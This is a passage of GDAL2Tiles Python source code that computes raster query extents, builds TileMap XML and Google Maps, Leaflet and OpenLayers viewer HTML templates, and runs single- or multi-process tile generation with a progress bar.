extent is returned in the native resolution of dataset ds.
raises Gdal2TilesError if the dataset does not contain anything inside this geo_query
"""
geotran = ds.GetGeoTransform()
rx = int((ulx - geotran[0]) / geotran[1] + 0.001)
ry = int((uly - geotran[3]) / geotran[5] + 0.001)
rxsize = int((lrx - ulx) / geotran[1] + 0.5)
rysize = int((lry - uly) / geotran[5] + 0.5)
if not querysize:
wxsize, wysize = rxsize, rysize
else:
wxsize, wysize = querysize, querysize
# Coordinates should not go out of the bounds of the raster
wx = 0
if rx < 0:
rxshift = abs(rx)
wx = int(wxsize * (float(rxshift) / rxsize))
wxsize = wxsize - wx
rxsize = rxsize - int(rxsize * (float(rxshift) / rxsize))
rx = 0
if rx + rxsize > ds.RasterXSize:
wxsize = int(wxsize * (float(ds.RasterXSize - rx) / rxsize))
rxsize = ds.RasterXSize - rx
wy = 0
if ry < 0:
ryshift = abs(ry)
wy = int(wysize * (float(ryshift) / rysize))
wysize = wysize - wy
rysize = rysize - int(rysize * (float(ryshift) / rysize))
ry = 0
if ry + rysize > ds.RasterYSize:
wysize = int(wysize * (float(ds.RasterYSize - ry) / rysize))
rysize = ds.RasterYSize - ry
return (rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize)
def generate_tilemapresource(self):
"""
Template for tilemapresource.xml. Returns filled string. Expected variables:
title, north, south, east, west, isepsg4326, projection, publishurl,
zoompixels, tile_size, tileformat, profile
"""
args = {}
args['title'] = self.options.title
args['south'], args['west'], args['north'], args['east'] = self.swne
args['tile_size'] = self.tile_size
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['profile'] = self.options.profile
if self.options.profile == 'mercator':
args['srs'] = "EPSG:3857"
elif self.options.profile == 'geodetic':
args['srs'] = "EPSG:4326"
elif self.options.s_srs:
args['srs'] = self.options.s_srs
elif self.out_srs:
args['srs'] = self.out_srs.ExportToWkt()
else:
args['srs'] = ""
s = """<?xml version="1.0" encoding="utf-8"?>
<TileMap version="1.0.0" tilemapservice="http://tms.osgeo.org/1.0.0">
<Title>%(title)s</Title>
<Abstract></Abstract>
<SRS>%(srs)s</SRS>
<BoundingBox minx="%(west).14f" miny="%(south).14f" maxx="%(east).14f" maxy="%(north).14f"/>
<Origin x="%(west).14f" y="%(south).14f"/>
<TileFormat width="%(tile_size)d" height="%(tile_size)d" mime-type="image/%(tileformat)s" extension="%(tileformat)s"/>
<TileSets profile="%(profile)s">
""" % args # noqa
for z in range(self.tminz, self.tmaxz + 1):
if self.options.profile == 'raster':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, (2**(self.nativezoom - z) * self.out_gt[1]), z)
elif self.options.profile == 'mercator':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, 156543.0339 / 2**z, z)
elif self.options.profile == 'geodetic':
s += """ <TileSet href="%s%d" units-per-pixel="%.14f" order="%d"/>\n""" % (
args['publishurl'], z, 0.703125 / 2**z, z)
s += """ </TileSets>
</TileMap>
"""
return s
def generate_googlemaps(self):
"""
Template for googlemaps.html implementing Overlay of tiles for 'mercator' profile.
It returns filled string. Expected variables:
title, googlemapskey, north, south, east, west, minzoom, maxzoom, tile_size, tileformat,
publishurl
"""
args = {}
args['title'] = self.options.title
args['googlemapskey'] = self.options.googlekey
args['south'], args['west'], args['north'], args['east'] = self.swne
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['tile_size'] = self.tile_size
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['copyright'] = self.options.copyright
s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<title>%(title)s</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta http-equiv='imagetoolbar' content='no'/>
<style type="text/css"> v\:* {behavior:url(#default#VML);}
html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
body { margin: 10px; background: #fff; }
h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
#header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
#subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
#map { height: 95%%; border: 1px solid #888; }
</style>
<script src='http://maps.google.com/maps?file=api&v=2&key=%(googlemapskey)s'></script>
<script>
//<![CDATA[
/*
* Constants for given map
* TODO: read it from tilemapresource.xml
*/
var mapBounds = new GLatLngBounds(new GLatLng(%(south)s, %(west)s), new GLatLng(%(north)s, %(east)s));
var mapMinZoom = %(minzoom)s;
var mapMaxZoom = %(maxzoom)s;
var opacity = 0.75;
var map;
var hybridOverlay;
/*
* Create a Custom Opacity GControl
* http://www.maptiler.org/google-maps-overlay-opacity-control/
*/
var CTransparencyLENGTH = 58;
// maximum width that the knob can move (slide width minus knob width)
function CTransparencyControl( overlay ) {
this.overlay = overlay;
this.opacity = overlay.getTileLayer().getOpacity();
}
CTransparencyControl.prototype = new GControl();
// This function positions the slider to match the specified opacity
CTransparencyControl.prototype.setSlider = function(pos) {
var left = Math.round((CTransparencyLENGTH*pos));
this.slide.left = left;
this.knob.style.left = left+"px";
this.knob.style.top = "0px";
}
// This function reads the slider and sets the overlay opacity level
CTransparencyControl.prototype.setOpacity = function() {
// set the global variable
opacity = this.slide.left/CTransparencyLENGTH;
this.map.clearOverlays();
this.map.addOverlay(this.overlay, { zPriority: 0 });
if (this.map.getCurrentMapType() == G_HYBRID_MAP) {
this.map.addOverlay(hybridOverlay);
}
}
// This gets called by the API when addControl(new CTransparencyControl())
CTransparencyControl.prototype.initialize = function(map) {
var that=this;
this.map = map;
// Is this MSIE, if so we need to use AlphaImageLoader
var agent = navigator.userAgent.toLowerCase();
if ((agent.indexOf("msie") > -1) && (agent.indexOf("opera") < 1)){this.ie = true} else {this.ie = false}
// create the background graphic as a <div> containing an image
var container = document.createElement("div");
container.style.width="70px";
container.style.height="21px";
// Handle transparent PNG files in MSIE
if (this.ie) {
var loader = "filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
container.innerHTML = '<div style="height:21px; width:70px; ' +loader+ '" ></div>';
} else {
container.innerHTML = '<div style="height:21px; width:70px; background-image: url(http://www.maptiler.org/img/opacity-slider.png)" ></div>';
}
// create the knob as a GDraggableObject
// Handle transparent PNG files in MSIE
if (this.ie) {
var loader = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
this.knob = document.createElement("div");
this.knob.style.height="21px";
this.knob.style.width="13px";
this.knob.style.overflow="hidden";
this.knob_img = document.createElement("div");
this.knob_img.style.height="21px";
this.knob_img.style.width="83px";
this.knob_img.style.filter=loader;
this.knob_img.style.position="relative";
this.knob_img.style.left="-70px";
this.knob.appendChild(this.knob_img);
} else {
this.knob = document.createElement("div");
this.knob.style.height="21px";
this.knob.style.width="13px";
this.knob.style.backgroundImage="url(http://www.maptiler.org/img/opacity-slider.png)";
this.knob.style.backgroundPosition="-70px 0px";
}
container.appendChild(this.knob);
this.slide=new GDraggableObject(this.knob, {container:container});
this.slide.setDraggableCursor('pointer');
this.slide.setDraggingCursor('pointer');
this.container = container;
// attach the control to the map
map.getContainer().appendChild(container);
// init slider
this.setSlider(this.opacity);
// Listen for the slider being moved and set the opacity
GEvent.addListener(this.slide, "dragend", function() {that.setOpacity()});
//GEvent.addListener(this.container, "click", function( x, y ) { alert(x, y) });
return container;
}
// Set the default position for the control
CTransparencyControl.prototype.getDefaultPosition = function() {
return new GControlPosition(G_ANCHOR_TOP_RIGHT, new GSize(7, 47));
}
/*
* Full-screen Window Resize
*/
function getWindowHeight() {
if (self.innerHeight) return self.innerHeight;
if (document.documentElement && document.documentElement.clientHeight)
return document.documentElement.clientHeight;
if (document.body) return document.body.clientHeight;
return 0;
}
function getWindowWidth() {
if (self.innerWidth) return self.innerWidth;
if (document.documentElement && document.documentElement.clientWidth)
return document.documentElement.clientWidth;
if (document.body) return document.body.clientWidth;
return 0;
}
function resize() {
var map = document.getElementById("map");
var header = document.getElementById("header");
var subheader = document.getElementById("subheader");
map.style.height = (getWindowHeight()-80) + "px";
map.style.width = (getWindowWidth()-20) + "px";
header.style.width = (getWindowWidth()-20) + "px";
subheader.style.width = (getWindowWidth()-20) + "px";
// map.checkResize();
}
/*
* Main load function:
*/
function load() {
if (GBrowserIsCompatible()) {
// Bug in the Google Maps: Copyright for Overlay is not correctly displayed
var gcr = GMapType.prototype.getCopyrights;
GMapType.prototype.getCopyrights = function(bounds,zoom) {
return ["%(copyright)s"].concat(gcr.call(this,bounds,zoom));
}
map = new GMap2( document.getElementById("map"), { backgroundColor: '#fff' } );
map.addMapType(G_PHYSICAL_MAP);
map.setMapType(G_PHYSICAL_MAP);
map.setCenter( mapBounds.getCenter(), map.getBoundsZoomLevel( mapBounds ));
hybridOverlay = new GTileLayerOverlay( G_HYBRID_MAP.getTileLayers()[1] );
GEvent.addListener(map, "maptypechanged", function() {
if (map.getCurrentMapType() == G_HYBRID_MAP) {
map.addOverlay(hybridOverlay);
} else {
map.removeOverlay(hybridOverlay);
}
} );
var tilelayer = new GTileLayer(GCopyrightCollection(''), mapMinZoom, mapMaxZoom);
var mercator = new GMercatorProjection(mapMaxZoom+1);
tilelayer.getTileUrl = function(tile,zoom) {
if ((zoom < mapMinZoom) || (zoom > mapMaxZoom)) {
return "http://www.maptiler.org/img/none.png";
}
var ymax = 1 << zoom;
var y = ymax - tile.y -1;
var tileBounds = new GLatLngBounds(
mercator.fromPixelToLatLng( new GPoint( (tile.x)*256, (tile.y+1)*256 ) , zoom ),
mercator.fromPixelToLatLng( new GPoint( (tile.x+1)*256, (tile.y)*256 ) , zoom )
);
if (mapBounds.intersects(tileBounds)) {
return zoom+"/"+tile.x+"/"+y+".png";
} else {
return "http://www.maptiler.org/img/none.png";
}
}
// IE 7-: support for PNG alpha channel
// Unfortunately, the opacity for whole overlay is then not changeable, either or...
tilelayer.isPng = function() { return true;};
tilelayer.getOpacity = function() { return opacity; }
overlay = new GTileLayerOverlay( tilelayer );
map.addOverlay(overlay);
map.addControl(new GLargeMapControl());
map.addControl(new GHierarchicalMapTypeControl());
map.addControl(new CTransparencyControl( overlay ));
""" % args # noqa
if self.kml:
s += """
map.addMapType(G_SATELLITE_3D_MAP);
map.getEarthInstance(getEarthInstanceCB);
"""
s += """
map.enableContinuousZoom();
map.enableScrollWheelZoom();
map.setMapType(G_HYBRID_MAP);
}
resize();
}
"""
if self.kml:
s += """
function getEarthInstanceCB(object) {
var ge = object;
if (ge) {
var url = document.location.toString();
url = url.substr(0,url.lastIndexOf('/'))+'/doc.kml';
var link = ge.createLink("");
if ("%(publishurl)s") { link.setHref("%(publishurl)s/doc.kml") }
else { link.setHref(url) };
var networkLink = ge.createNetworkLink("");
networkLink.setName("TMS Map Overlay");
networkLink.setFlyToView(true);
networkLink.setLink(link);
ge.getFeatures().appendChild(networkLink);
} else {
// alert("You should open a KML in Google Earth");
// add div with the link to generated KML... - maybe JavaScript redirect to the URL of KML?
}
}
""" % args # noqa
s += """
onresize=function(){ resize(); };
//]]>
</script>
</head>
<body onload="load()">
<div id="header"><h1>%(title)s</h1></div>
<div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>
<!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU -->
</div>
<div id="map"></div>
</body>
</html>
""" % args # noqa
return s
def generate_leaflet(self):
"""
Template for leaflet.html implementing overlay of tiles for 'mercator' profile.
It returns filled string. Expected variables:
title, north, south, east, west, minzoom, maxzoom, tile_size, tileformat, publishurl
"""
args = {}
args['title'] = self.options.title.replace('"', '\\"')
args['htmltitle'] = self.options.title
args['south'], args['west'], args['north'], args['east'] = self.swne
args['centerlon'] = (args['north'] + args['south']) / 2.
args['centerlat'] = (args['west'] + args['east']) / 2.
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['beginzoom'] = self.tmaxz
args['tile_size'] = self.tile_size # not used
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url # not used
args['copyright'] = self.options.copyright.replace('"', '\\"')
s = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name='viewport' content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no' />
<title>%(htmltitle)s</title>
<!-- Leaflet -->
<link rel="stylesheet" href="http://cdn.leafletjs.com/leaflet-0.7.5/leaflet.css" />
<script src="http://cdn.leafletjs.com/leaflet-0.7.5/leaflet.js"></script>
<style>
body { margin:0; padding:0; }
body, table, tr, td, th, div, h1, h2, input { font-family: "Calibri", "Trebuchet MS", "Ubuntu", Serif; font-size: 11pt; }
#map { position:absolute; top:0; bottom:0; width:100%%; } /* full size */
.ctl {
padding: 2px 10px 2px 10px;
background: white;
background: rgba(255,255,255,0.9);
box-shadow: 0 0 15px rgba(0,0,0,0.2);
border-radius: 5px;
text-align: right;
}
.title {
font-size: 18pt;
font-weight: bold;
}
.src {
font-size: 10pt;
}
</style>
</head>
<body>
<div id="map"></div>
<script>
/* **** Leaflet **** */
// Base layers
// .. OpenStreetMap
var osm = L.tileLayer('http://{s}.tile.osm.org/{z}/{x}/{y}.png', {attribution: '© <a href="http://osm.org/copyright">OpenStreetMap</a> contributors'});
// .. CartoDB Positron
var cartodb = L.tileLayer('http://{s}.basemaps.cartocdn.com/light_all/{z}/{x}/{y}.png', {attribution: '© <a href="http://www.openstreetmap.org/copyright">OpenStreetMap</a> contributors, © <a href="http://cartodb.com/attributions">CartoDB</a>'});
// .. OSM Toner
var toner = L.tileLayer('http://{s}.tile.stamen.com/toner/{z}/{x}/{y}.png', {attribution: 'Map tiles by <a href="http://stamen.com">Stamen Design</a>, under <a href="http://creativecommons.org/licenses/by/3.0">CC BY 3.0</a>. Data by <a href="http://openstreetmap.org">OpenStreetMap</a>, under <a href="http://www.openstreetmap.org/copyright">ODbL</a>.'});
// .. White background
var white = L.tileLayer("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAQAAAAEAAQMAAABmvDolAAAAA1BMVEX///+nxBvIAAAAH0lEQVQYGe3BAQ0AAADCIPunfg43YAAAAAAAAAAA5wIhAAAB9aK9BAAAAABJRU5ErkJggg==");
// Overlay layers (TMS)
var lyr = L.tileLayer('./{z}/{x}/{y}.%(tileformat)s', {tms: true, opacity: 0.7, attribution: "%(copyright)s"});
// Map
var map = L.map('map', {
center: [%(centerlon)s, %(centerlat)s],
zoom: %(beginzoom)s,
minZoom: %(minzoom)s,
maxZoom: %(maxzoom)s,
layers: [osm]
});
var basemaps = {"OpenStreetMap": osm, "CartoDB Positron": cartodb, "Stamen Toner": toner, "Without background": white}
var overlaymaps = {"Layer": lyr}
// Title
var title = L.control();
title.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'ctl title');
this.update();
return this._div;
};
title.update = function(props) {
this._div.innerHTML = "%(title)s";
};
title.addTo(map);
// Note
var src = 'Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>';
var title = L.control({position: 'bottomleft'});
title.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'ctl src');
this.update();
return this._div;
};
title.update = function(props) {
this._div.innerHTML = src;
};
title.addTo(map);
// Add base layers
L.control.layers(basemaps, overlaymaps, {collapsed: false}).addTo(map);
// Fit to overlay bounds (SW and NE points with (lat, lon))
map.fitBounds([[%(south)s, %(east)s], [%(north)s, %(west)s]]);
</script>
</body>
</html>
""" % args # noqa
return s
def generate_openlayers(self):
"""
Template for openlayers.html implementing overlay of available Spherical Mercator layers.
It returns filled string. Expected variables:
title, bingkey, north, south, east, west, minzoom, maxzoom, tile_size, tileformat, publishurl
"""
args = {}
args['title'] = self.options.title
args['bingkey'] = self.options.bingkey
args['south'], args['west'], args['north'], args['east'] = self.swne
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['tile_size'] = self.tile_size
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['copyright'] = self.options.copyright
if self.options.tmscompatible:
args['tmsoffset'] = "-1"
else:
args['tmsoffset'] = ""
if self.options.profile == 'raster':
args['rasterzoomlevels'] = self.tmaxz + 1
args['rastermaxresolution'] = 2**(self.nativezoom) * self.out_gt[1]
s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
<head>
<title>%(title)s</title>
<meta http-equiv='imagetoolbar' content='no'/>
<style type="text/css"> v\:* {behavior:url(#default#VML);}
html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
body { margin: 10px; background: #fff; }
h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
#header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
#subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
#map { height: 95%%; border: 1px solid #888; }
.olImageLoadError { display: none; }
.olControlLayerSwitcher .layersDiv { border-radius: 10px 0 0 10px; }
</style>""" % args # noqa
if self.options.profile == 'mercator':
s += """
<script src='http://maps.google.com/maps/api/js?sensor=false&v=3.7'></script>
""" % args
s += """
<script src="http://www.openlayers.org/api/2.12/OpenLayers.js"></script>
<script>
var map;
var mapBounds = new OpenLayers.Bounds( %(west)s, %(south)s, %(east)s, %(north)s);
var mapMinZoom = %(minzoom)s;
var mapMaxZoom = %(maxzoom)s;
var emptyTileURL = "http://www.maptiler.org/img/none.png";
OpenLayers.IMAGE_RELOAD_ATTEMPTS = 3;
function init(){""" % args
if self.options.profile == 'mercator':
s += """
var options = {
div: "map",
controls: [],
projection: "EPSG:3857",
displayProjection: new OpenLayers.Projection("EPSG:4326"),
numZoomLevels: 20
};
map = new OpenLayers.Map(options);
// Create Google Mercator layers
var gmap = new OpenLayers.Layer.Google("Google Streets",
{
type: google.maps.MapTypeId.ROADMAP,
sphericalMercator: true
});
var gsat = new OpenLayers.Layer.Google("Google Satellite",
{
type: google.maps.MapTypeId.SATELLITE,
sphericalMercator: true
});
var ghyb = new OpenLayers.Layer.Google("Google Hybrid",
{
type: google.maps.MapTypeId.HYBRID,
sphericalMercator: true
});
var gter = new OpenLayers.Layer.Google("Google Terrain",
{
type: google.maps.MapTypeId.TERRAIN,
sphericalMercator: true
});
// Create Bing layers
var broad = new OpenLayers.Layer.Bing({
name: "Bing Roads",
key: "%(bingkey)s",
type: "Road",
sphericalMercator: true
});
var baer = new OpenLayers.Layer.Bing({
name: "Bing Aerial",
key: "%(bingkey)s",
type: "Aerial",
sphericalMercator: true
});
var bhyb = new OpenLayers.Layer.Bing({
name: "Bing Hybrid",
key: "%(bingkey)s",
type: "AerialWithLabels",
sphericalMercator: true
});
// Create OSM layer
var osm = new OpenLayers.Layer.OSM("OpenStreetMap");
// create TMS Overlay layer
var tmsoverlay = new OpenLayers.Layer.TMS("TMS Overlay", "",
{
serviceVersion: '.',
layername: '.',
alpha: true,
type: '%(tileformat)s',
isBaseLayer: false,
getURL: getURL
});
if (OpenLayers.Util.alphaHack() == false) {
tmsoverlay.setOpacity(0.7);
}
map.addLayers([gmap, gsat, ghyb, gter,
broad, baer, bhyb,
osm, tmsoverlay]);
var switcherControl = new OpenLayers.Control.LayerSwitcher();
map.addControl(switcherControl);
switcherControl.maximizeControl();
map.zoomToExtent(mapBounds.transform(map.displayProjection, map.projection));
""" % args # noqa
elif self.options.profile == 'geodetic':
s += """
var options = {
div: "map",
controls: [],
projection: "EPSG:4326"
};
map = new OpenLayers.Map(options);
var wms = new OpenLayers.Layer.WMS("VMap0",
"http://tilecache.osgeo.org/wms-c/Basic.py?",
{
layers: 'basic',
format: 'image/png'
}
);
var tmsoverlay = new OpenLayers.Layer.TMS("TMS Overlay", "",
{
serviceVersion: '.',
layername: '.',
alpha: true,
type: '%(tileformat)s',
isBaseLayer: false,
getURL: getURL
});
if (OpenLayers.Util.alphaHack() == false) {
tmsoverlay.setOpacity(0.7);
}
map.addLayers([wms,tmsoverlay]);
var switcherControl = new OpenLayers.Control.LayerSwitcher();
map.addControl(switcherControl);
switcherControl.maximizeControl();
map.zoomToExtent(mapBounds);
""" % args # noqa
elif self.options.profile == 'raster':
s += """
var options = {
div: "map",
controls: [],
maxExtent: new OpenLayers.Bounds(%(west)s, %(south)s, %(east)s, %(north)s),
maxResolution: %(rastermaxresolution)f,
numZoomLevels: %(rasterzoomlevels)d
};
map = new OpenLayers.Map(options);
var layer = new OpenLayers.Layer.TMS("TMS Layer", "",
{
serviceVersion: '.',
layername: '.',
alpha: true,
type: '%(tileformat)s',
getURL: getURL
});
map.addLayer(layer);
map.zoomToExtent(mapBounds);
""" % args # noqa
s += """
map.addControls([new OpenLayers.Control.PanZoomBar(),
new OpenLayers.Control.Navigation(),
new OpenLayers.Control.MousePosition(),
new OpenLayers.Control.ArgParser(),
new OpenLayers.Control.Attribution()]);
}
""" % args
if self.options.profile == 'mercator':
s += """
function getURL(bounds) {
bounds = this.adjustBounds(bounds);
var res = this.getServerResolution();
var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tile_size.w));
var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tile_size.h));
var z = this.getServerZoom();
if (this.map.baseLayer.CLASS_NAME === 'OpenLayers.Layer.Bing') {
z+=1;
}
var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
var url = this.url;
if (OpenLayers.Util.isArray(url)) {
url = this.selectUrl(path, url);
}
if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
return url + path;
} else {
return emptyTileURL;
}
}
""" % args # noqa
elif self.options.profile == 'geodetic':
s += """
function getURL(bounds) {
bounds = this.adjustBounds(bounds);
var res = this.getServerResolution();
var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tile_size.w));
var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tile_size.h));
var z = this.getServerZoom()%(tmsoffset)s;
var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
var url = this.url;
if (OpenLayers.Util.isArray(url)) {
url = this.selectUrl(path, url);
}
if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
return url + path;
} else {
return emptyTileURL;
}
}
""" % args # noqa
elif self.options.profile == 'raster':
s += """
function getURL(bounds) {
bounds = this.adjustBounds(bounds);
var res = this.getServerResolution();
var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tile_size.w));
var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tile_size.h));
var z = this.getServerZoom();
var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
var url = this.url;
if (OpenLayers.Util.isArray(url)) {
url = this.selectUrl(path, url);
}
if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
return url + path;
} else {
return emptyTileURL;
}
}
""" % args # noqa
s += """
function getWindowHeight() {
if (self.innerHeight) return self.innerHeight;
if (document.documentElement && document.documentElement.clientHeight)
return document.documentElement.clientHeight;
if (document.body) return document.body.clientHeight;
return 0;
}
function getWindowWidth() {
if (self.innerWidth) return self.innerWidth;
if (document.documentElement && document.documentElement.clientWidth)
return document.documentElement.clientWidth;
if (document.body) return document.body.clientWidth;
return 0;
}
function resize() {
var map = document.getElementById("map");
var header = document.getElementById("header");
var subheader = document.getElementById("subheader");
map.style.height = (getWindowHeight()-80) + "px";
map.style.width = (getWindowWidth()-20) + "px";
header.style.width = (getWindowWidth()-20) + "px";
subheader.style.width = (getWindowWidth()-20) + "px";
if (map.updateSize) { map.updateSize(); };
}
onresize=function(){ resize(); };
</script>
</head>
<body onload="init()">
<div id="header"><h1>%(title)s</h1></div>
<div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>
<!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU -->
</div>
<div id="map"></div>
<script type="text/javascript" >resize()</script>
</body>
</html>""" % args # noqa
return s
def worker_tile_details(input_file, output_folder, options, send_pipe=None):
try:
gdal2tiles = GDAL2Tiles(input_file, output_folder, options)
gdal2tiles.open_input()
gdal2tiles.generate_metadata()
tile_job_info, tile_details = gdal2tiles.generate_base_tiles()
return_data = (tile_job_info, tile_details)
if send_pipe:
send_pipe.send(return_data)
return return_data
except Exception as e:
print("worker_tile_details failed ", str(e))
def progress_printer_thread(queue, nb_jobs):
pb = ProgressBar(nb_jobs)
pb.start()
for _ in range(nb_jobs):
queue.get()
pb.log_progress()
queue.task_done()
class ProgressBar(object):
def __init__(self, total_items):
self.total_items = total_items
self.nb_items_done = 0
self.current_progress = 0
self.STEP = 2.5
def start(self):
sys.stdout.write("0")
def log_progress(self, nb_items=1):
self.nb_items_done += nb_items
progress = float(self.nb_items_done) / self.total_items * 100
if progress >= self.current_progress + self.STEP:
done = False
while not done:
if self.current_progress + self.STEP <= progress:
self.current_progress += self.STEP
if self.current_progress % 10 == 0:
sys.stdout.write(str(int(self.current_progress)))
if self.current_progress == 100:
sys.stdout.write("\n")
else:
sys.stdout.write(".")
else:
done = True
sys.stdout.flush()
def get_tile_swne(tile_job_info, options):
if options.profile == 'mercator':
mercator = GlobalMercator()
tile_swne = mercator.TileLatLonBounds
elif options.profile == 'geodetic':
geodetic = GlobalGeodetic(options.tmscompatible)
tile_swne = geodetic.TileLatLonBounds
elif options.profile == 'raster':
srs4326 = osr.SpatialReference()
srs4326.ImportFromEPSG(4326)
if tile_job_info.kml and tile_job_info.in_srs_wkt:
in_srs = osr.SpatialReference()
in_srs.ImportFromWkt(tile_job_info.in_srs_wkt)
ct = osr.CoordinateTransformation(in_srs, srs4326)
def rastertileswne(x, y, z):
pixelsizex = (2 ** (tile_job_info.tmaxz - z) * tile_job_info.out_geo_trans[1])
west = tile_job_info.out_geo_trans[0] + x * tile_job_info.tile_size * pixelsizex
east = west + tile_job_info.tile_size * pixelsizex
south = tile_job_info.ominy + y * tile_job_info.tile_size * pixelsizex
north = south + tile_job_info.tile_size * pixelsizex
if not tile_job_info.is_epsg_4326:
# Transformation to EPSG:4326 (WGS84 datum)
west, south = ct.TransformPoint(west, south)[:2]
east, north = ct.TransformPoint(east, north)[:2]
return south, west, north, east
tile_swne = rastertileswne
else:
tile_swne = lambda x, y, z: (0, 0, 0, 0) # noqa
else:
tile_swne = lambda x, y, z: (0, 0, 0, 0) # noqa
return tile_swne
def single_threaded_tiling(input_file, output_folder, options):
"""
Keep a single threaded version that stays clear of multiprocessing, for platforms that would not
support it
"""
if options.verbose:
print("Begin tiles details calc")
conf, tile_details = worker_tile_details(input_file, output_folder, options)
if options.verbose:
print("Tiles details calc complete.")
if not options.verbose and not options.quiet:
progress_bar = ProgressBar(len(tile_details))
progress_bar.start()
for tile_detail in tile_details:
create_base_tile(conf, tile_detail)
if not options.verbose and not options.quiet:
progress_bar.log_progress()
if getattr(threadLocal, 'cached_ds', None):
del threadLocal.cached_ds
create_overview_tiles(conf, output_folder, options)
shutil.rmtree(os.path.dirname(conf.src_file))
def multi_threaded_tiling(input_file, output_folder, options):
nb_processes = options.nb_processes or 1
# Make sure that all processes do not consume more than GDAL_CACHEMAX
os.environ['GDAL_CACHEMAX'] = '%d' % int(gdal.GetCacheMax() / nb_processes)
(conf_receiver, conf_sender) = Pipe(False)
if options.verbose:
print("Begin tiles details calc")
p = Process(target=worker_tile_details,
args=[input_file, output_folder, options],
kwargs={"send_pipe": conf_sender})
p.start()
# Make sure to consume the queue before joining. If the payload is too big, it won't be put in
# one go in the queue and therefore the sending process will never finish, waiting for space in
# the queue to send data
conf, tile_details = conf_receiver.recv()
p.join()
if options.verbose:
print("Tiles details calc complete.")
# Have to create the Queue through a multiprocessing.Manager to get a Queue Proxy,
# otherwise you can't pass it as a param in the method invoked by the pool...
manager = Manager()
queue = manager.Queue()
pool = Pool(processes=nb_processes)
# TODO: gbataille - check the confs for which each element is an array... one useless level?
# TODO: gbataille - assign an ID to each job for print in verbose mode "ReadRaster Extent ..."
for tile_detail in tile_details:
pool.apply_async(create_base_tile, (conf, tile_detail), {"queue": queue})
if not options.verbose and not options.quiet:
p = Process(target=progress_printer_thread, args=[queue, len(tile_details)])
p.start()
pool.close()
pool.join() # Jobs finished
if not options.verbose and not options.quiet:
p.join() # Traces done
create_overview_tiles(conf, output_folder, options)
shutil.rmtree(os.path.dirname(conf.src_file))
def main():
